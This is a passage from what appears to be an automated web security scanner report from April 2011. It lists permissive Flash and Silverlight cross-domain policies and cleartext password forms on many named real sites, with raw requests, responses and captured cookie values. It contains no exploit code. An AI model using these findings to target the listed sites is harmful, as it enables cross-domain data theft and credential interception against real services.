Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Tue, 26 Apr 2011 14:34:49 GMT
Content-Type: text/xml
Content-Length: 207
Date: Mon, 25 Apr 2011 14:34:49 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.28. http://pl.yumenetworks.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pl.yumenetworks.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: pl.yumenetworks.com
Proxy-Connection: keep-alive
Referer: http://games.mochiads.com/c/g/moon-volley/mvolley.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:53:48 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.7a DAV/2
Last-Modified: Sun, 17 Aug 2008 20:39:50 GMT
ETag: "10d0439-122-454addb2bd180"
Accept-Ranges: bytes
Content-Length: 290
P3P: policyref="http://ads.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allo
...[SNIP]...

6.29. http://playspal.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://playspal.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: playspal.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 25 Apr 2011 14:54:27 GMT
Content-Type: application/xml
Connection: close
Last-Modified: Tue, 23 Nov 2010 09:52:59 GMT
ETag: "9828d2a-68-4ceb8efb"
Accept-Ranges: bytes
Content-Length: 104

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.30. http://pretty.ru/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pretty.ru
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pretty.ru

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:24:34 GMT
Content-Type: text/xml; charset=UTF-8
Content-Length: 145
Last-Modified: Wed, 13 Apr 2011 14:01:14 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.31. http://r2.mail.ru/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: r2.mail.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:29:54 GMT
Content-Type: text/xml
Content-Length: 201
Last-Modified: Thu, 21 Oct 2010 07:11:54 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.32. http://rbcgaru.hit.gemius.pl/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://rbcgaru.hit.gemius.pl
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: rbcgaru.hit.gemius.pl

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:44:56 GMT
Expires: Tue, 26 Apr 2011 02:44:56 GMT
Accept-Ranges: none
Cache-Control: max-age=43200
Last-Modified: Fri, 25 Mar 2011 05:08:30 GMT
Set-Cookie: Gtestss=Fsq2YwPLQP_9r7xYrzcdmPT7; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
Set-Cookie: Gdyn=KlSwsBFGvGQp0xo8SLL8RScGGGMaxFmPxD14HsMQGs..; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
P3P: CP="NOI DSP COR NID PSAo OUR IND"
Connection: close
Content-Type: text/xml
Content-Length: 246

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.33. http://rs.mail.ru/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://rs.mail.ru
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: rs.mail.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:45:40 GMT
Content-Type: text/xml
Content-Length: 201
Last-Modified: Thu, 21 Oct 2010 07:11:54 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.34. http://s0.2mdn.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s0.2mdn.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 24 Apr 2011 21:09:16 GMT
Expires: Thu, 21 Apr 2011 21:08:25 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 63651
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.35. http://search.twitter.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://search.twitter.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: search.twitter.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:40:08 GMT
Server: hi
Last-Modified: Tue, 25 Jan 2011 18:04:30 GMT
Cache-Control: max-age=1800
Expires: Mon, 25 Apr 2011 15:01:27 GMT
Content-Type: application/xml
Content-Length: 206
Vary: Accept-Encoding
X-Varnish: 124651946 124570955
Age: 521
Via: 1.1 varnish
X-Cache-Svr: smf1-aaq-31-sr2.prod.twitter.com
X-Cache: HIT
X-Cache-Hits: 4
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.36. http://widgets.fotocash.ru/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.fotocash.ru
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: widgets.fotocash.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 25 Apr 2011 14:29:10 GMT
Content-Type: text/xml
Content-Length: 138
Last-Modified: Thu, 21 Oct 2010 13:56:12 GMT
Connection: close
Expires: Wed, 25 May 2011 14:29:10 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permitted-cross-domain-policies="master-only"/>
</cross-domain-policy>

6.37. http://gomail.radar.imgsmail.ru/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://gomail.radar.imgsmail.ru
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: gomail.radar.imgsmail.ru

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 14:51:42 GMT
Server: Apache/1.3.27 (Unix) mru_xml/0.471 gorgona/2.1 mod_jk/1.2.4 mod_ruby/1.0.7 Ruby/1.6.8 mod_mrim/0.17
Connection: close
Content-Length: 172
Content-Type: text/xml

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*.mail.ru" to-ports="*"/><allow-access-from domain="*.imgsmail.ru" to-ports="*"/></cross-domain-policy>

6.38. http://googleads.g.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sun, 24 Apr 2011 21:14:04 GMT
Expires: Mon, 25 Apr 2011 21:14:04 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 53567
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.39. http://imagesrv.gartner.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imagesrv.gartner.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: imagesrv.gartner.com

Response

HTTP/1.1 200 OK
Connection: close
Content-type: text/xml
Last-modified: Mon, 11 Jan 2010 19:57:11 GMT
Date: Mon, 25 Apr 2011 12:11:16 GMT
Content-Length: 250
ETag: "pv3dca051be9ba6a415f8df8e0b0d315af"
X-PvInfo: [S10232.C10821.A151092.RA0.G24F27.U50F79C0A].[OT/xml.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: bytes
Set-Cookie: TS83f541=3bc17e06277dbf6b1363ce7f36ea10b3bb7b54d78751fcaa4db564e4; Path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.gartner.com" />
<allow-access-from domain="imagesrv" />
...[SNIP]...

6.40. http://img.dt00.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://img.dt00.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: img.dt00.net

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:50:50 GMT
Content-Type: text/xml
Content-Length: 526
Last-Modified: Thu, 22 Apr 2010 11:07:27 GMT
Connection: close
Expires: Wed, 25 May 2011 14:50:50 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="intv.ru" to-ports="80"/>
<allow-http-request-headers-from domain="intv.ru" headers="*" />
<allow-access-from domain="*.intv.ru" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="www.liveresult.ru" to-ports="80"/>
...[SNIP]...

6.41. http://img.imgsmail.ru/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://img.imgsmail.ru
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: img.imgsmail.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 25 Apr 2011 14:54:43 GMT
Content-Type: text/xml
Content-Length: 358
Last-Modified: Thu, 15 Apr 2010 15:17:53 GMT
Connection: close
Expires: Mon, 02 May 2011 14:54:43 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*.files.mail.ru" to-ports="80" />
<allow-access-from domain="img.imgsmail.ru" to-ports="80" />
<allow-access-from domain="*.mail.ru" to-ports="80" />
...[SNIP]...
<allow-access-from domain="mail.ru" to-ports="80" />
...[SNIP]...

6.42. http://img.mail.ru/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://img.mail.ru
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: img.mail.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 25 Apr 2011 14:34:11 GMT
Content-Type: text/xml
Content-Length: 358
Last-Modified: Thu, 15 Apr 2010 15:17:53 GMT
Connection: close
Expires: Mon, 02 May 2011 14:34:11 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*.files.mail.ru" to-ports="80" />
<allow-access-from domain="img.imgsmail.ru" to-ports="80" />
<allow-access-from domain="*.mail.ru" to-ports="80" />
...[SNIP]...
<allow-access-from domain="mail.ru" to-ports="80" />
...[SNIP]...

6.43. http://js.dt00.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://js.dt00.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: js.dt00.net

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:40:24 GMT
Content-Type: text/xml
Content-Length: 526
Last-Modified: Thu, 22 Apr 2010 11:07:27 GMT
Connection: close
Expires: Wed, 25 May 2011 14:40:24 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="intv.ru" to-ports="80"/>
<allow-http-request-headers-from domain="intv.ru" headers="*" />
<allow-access-from domain="*.intv.ru" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="www.liveresult.ru" to-ports="80"/>
...[SNIP]...

6.44. http://mail.radar.imgsmail.ru/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://mail.radar.imgsmail.ru
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: mail.radar.imgsmail.ru

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 14:25:12 GMT
Server: Apache/1.3.27 (Unix) mru_xml/0.471 gorgona/2.1 mod_jk/1.2.4 mod_ruby/1.0.7 Ruby/1.6.8 mod_mrim/0.17
Connection: close
Content-Length: 172
Content-Type: text/xml

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*.mail.ru" to-ports="*"/><allow-access-from domain="*.imgsmail.ru" to-ports="*"/></cross-domain-policy>

6.45. http://mail.ru/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://mail.ru
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: mail.ru

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 14:24:41 GMT
Server: Apache/1.3.27 (Unix) mru_xml/0.471 gorgona/2.1 mod_jk/1.2.4 mod_ruby/1.0.7 Ruby/1.6.8 mod_mrim/0.17
Connection: close
Set-Cookie: mrcu=1AB44DB58429635EFBCAF3D6C1AD; expires=Thu, 22 Apr 2021 14:24:41 GMT; path=/; domain=.mail.ru
Content-Length: 343
Content-Type: text/xml

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*.files.mail.ru" to-ports="80"/><allow-access-from domain="img.imgsmail.ru" to-ports="80"/><allow-access-from domain="win.mail.ru" to-ports="80"/><allow-access-from domain="e.mail.ru" to-ports="80"/>
...[SNIP]...

6.46. http://odnoklassniki.ru/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://odnoklassniki.ru
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: odnoklassniki.ru

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"1148-1303437212000"
Last-Modified: Fri, 22 Apr 2011 01:53:32 GMT
Content-Type: application/xml;charset=UTF-8
Content-Length: 1148
Date: Mon, 25 Apr 2011 14:26:37 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-http-request-headers-from domain="odnoklassniki.ru" headers="*"/>
<allow-http-
...[SNIP]...
<allow-access-from domain="*.odnoklassniki.ru"/>
<allow-access-from domain="odnoklassniki.ua"/>
<allow-access-from domain="*.odnoklassniki.ua"/>
<allow-access-from domain="odnoklasniki.ru"/>
<allow-access-from domain="*.odnoklasniki.ru"/>
<allow-access-from domain="odnoklasniki.ua"/>
<allow-access-from domain="*.odnoklasniki.ua"/>
...[SNIP]...

6.47. http://oth.dt00.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://oth.dt00.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: oth.dt00.net

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:32:23 GMT
Content-Type: text/xml
Content-Length: 526
Last-Modified: Thu, 22 Apr 2010 11:07:27 GMT
Connection: close
Expires: Wed, 25 May 2011 14:32:23 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="intv.ru" to-ports="80"/>
<allow-http-request-headers-from domain="intv.ru" headers="*" />
<allow-access-from domain="*.intv.ru" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="www.liveresult.ru" to-ports="80"/>
...[SNIP]...

6.48. http://www.gartner.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.gartner.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Connection: close
Content-type: text/xml
Last-modified: Mon, 28 Jan 2008 18:59:12 GMT
Date: Mon, 25 Apr 2011 12:10:49 GMT
Content-Length: 214
ETag: "pve91a8585e0a42393cfbb818f11d57002"
X-PvInfo: [S10232.C10821.A151092.RA0.G24F27.UDDE6142E].[OT/xml.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: bytes
Set-Cookie: TS83f541=1da366c651cf93bce481d43030625b76ac71a41bc37e25a84db564c8; Path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.gartner.com" />
</cross-
...[SNIP]...

6.49. http://www.livejournal.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.livejournal.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.livejournal.com

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Mon, 25 Apr 2011 14:27:55 GMT
Content-Type: text/xml
Connection: close
X-AWS-Id: ws07
Set-Cookie: ljuniq=BlrhjlxYzDyERwT:1303741675:pgstats0:m0; expires=Friday, 24-Jun-2011 14:27:55 GMT; domain=.livejournal.com; path=/
Last-Modified: Thu, 17 Mar 2011 16:39:44 GMT
ETag: "bb0fbb-26b-49eb04f04f400"
Accept-Ranges: bytes
Content-Length: 619
X-Varnish: 1789549813
Age: 0
Via: 1.1 varnish

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-coss-domain-polic
...[SNIP]...
<allow-access-from domain="wh.lj.ru"/>
<allow-access-from domain="ljaqua.wh.lj.ru"/>
<allow-access-from domain="swfplayer.services.livejournal.com"/>
<allow-access-from domain="player.livejournal.ru"/>
<allow-access-from domain="player.championat.net"/>
<allow-access-from domain="player.gazeta.ru"/>
<allow-access-from domain="player.quto.ru"/>
...[SNIP]...

7. Silverlight cross-domain policy previous next
There are 5 instances of this issue:

http://ad.doubleclick.net/clientaccesspolicy.xml
http://b.voicefive.com/clientaccesspolicy.xml
http://beacon.securestudies.com/clientaccesspolicy.xml
http://pl.yumenetworks.com/clientaccesspolicy.xml
http://s0.2mdn.net/clientaccesspolicy.xml

7.1. http://ad.doubleclick.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Mon, 25 Apr 2011 14:31:42 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.2. http://b.voicefive.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.voicefive.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Tue, 26 Apr 2011 14:23:30 GMT
Date: Mon, 25 Apr 2011 14:23:30 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

7.3. http://beacon.securestudies.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://beacon.securestudies.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: beacon.securestudies.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Tue, 26 Apr 2011 14:50:23 GMT
Date: Mon, 25 Apr 2011 14:50:23 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

7.4. http://pl.yumenetworks.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pl.yumenetworks.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pl.yumenetworks.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:53:49 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.7a DAV/2
Last-Modified: Fri, 18 Mar 2011 06:46:34 GMT
ETag: "21a082c-135-49ebc23880680"
Accept-Ranges: bytes
Content-Length: 309
P3P: policyref="http://ads.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="*"/>
</allow-from>
<grant-to>
<resourc
...[SNIP]...

7.5. http://s0.2mdn.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s0.2mdn.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Mon, 25 Apr 2011 13:07:06 GMT
Expires: Tue, 26 Apr 2011 13:07:06 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 6181

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

8. Cleartext submission of password previous next
There are 10 instances of this issue:

http://direct.yandex.ru/
http://direct.yandex.ru/pages/direct/_direct-1303387947.js
http://mail.ru/
http://my.webalta.ru/public/engine/templates.js
http://my.webalta.ru/public/engine/templates.js
http://odnoklassniki.ru/
http://pda.loveplanet.ru/
http://pretty.ru/
http://vkontakte.ru/
http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/

8.1. http://direct.yandex.ru/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://direct.yandex.ru
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://passport.yandex.ru/passport?mode=auth&from=direct&retpath=http%3A%2F%2Fdirect.yandex.ru%2Fregistered%2Fmain.pl

The form contains the following password field:

passwd

Request

GET /?partner HTTP/1.1
Host: direct.yandex.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
